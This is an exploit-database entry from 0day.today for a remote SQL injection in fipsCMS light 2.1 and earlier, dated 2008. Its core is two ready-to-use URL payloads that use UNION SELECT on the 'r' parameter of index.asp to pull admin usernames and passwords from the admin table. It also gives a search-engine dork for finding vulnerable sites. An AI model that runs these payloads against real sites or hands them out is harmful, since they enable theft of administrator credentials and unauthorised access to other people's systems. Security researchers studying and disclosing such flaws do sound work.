[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability

Author
U238
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3450
Category
web applications
Date add
25-07-2008
Platform
unsorted
===========================================================
fipsCMS light <= 2.1 (r) Remote SQL Injection Vulnerability
===========================================================



Exploit Code:

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,username,null,0x1 from admin

victim/path/home/index.asp?w=pages&r=9999999 union select all 0,password,null,0x1 from admin

http://localhost:2222/lab/cms/_admin

Download:http://login.fipsasp.com/File.asp?ID=60&CatID=5
Found By U238
# Exploit Search Find: ^o)
#
# fipsCMS light - A© fipsASP 2003 - 2008. All rights reserved
#
# fipsCMS light - A© fipsASP 2003 - 2008
#
# inurl:"fipsASP 2003 - 2008"
# ************************************************ 



#  0day.today [2024-12-24]  #